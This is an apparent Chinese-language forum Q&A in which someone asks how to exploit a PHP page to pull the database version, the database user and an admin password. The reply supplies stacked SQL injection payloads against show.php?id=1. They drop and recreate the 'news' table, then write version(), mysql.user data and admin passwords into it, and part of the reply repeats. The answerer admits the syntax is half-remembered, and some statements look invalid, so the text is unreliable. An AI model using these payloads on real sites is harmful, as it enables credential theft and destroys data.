有這樣一段php程式碼
請問最後如何透過利用腳本查詢資料庫版本,資料庫用戶,和欄位為1的password內容
你意會吧,如果是我的話我可能會試試看這麼做。 。 。 sql注入只了解一些簡單的原理來著。 。 。 sql語法我都忘光了。 。 。文法不對的部分你自己查一下文法改下吧。 。 。
# 获得数据库版本 show.php?id=1;drop table news; create table news(title char(1024),id int); insert into news values(select version(), 1); show.php?id=1 # 获取数据库用户 show.php?id=1;drop table news; create table news(title char(1024), id int); select user,1 from mysql.user into news; show.php?id=1 # 获取表admin ID为1字段password的内容 show.php?id=1;drop table news; create table news(title char(1024), id int); select password, 1 from admin where id = 1 into news; show.php?id=1
額對了。 。一般還是別做得這麼絕。 。 。 rename一下原來的news,所有的資訊都查完之後把沒用的news刪掉再rename回去吧。 。 。但是rename語句我忘了。 。 。
你意會吧,如果是我的話我可能會試試看這麼做。 。 。
sql注入只了解一些簡單的原理來著。 。 。
sql語法我都忘光了。 。 。文法不對的部分你自己查一下文法改下吧。 。 。
額對了。 。一般還是別做得這麼絕。 。 。
rename一下原來的news,所有的資訊都查完之後把沒用的news刪掉再rename回去吧。 。 。但是rename語句我忘了。 。 。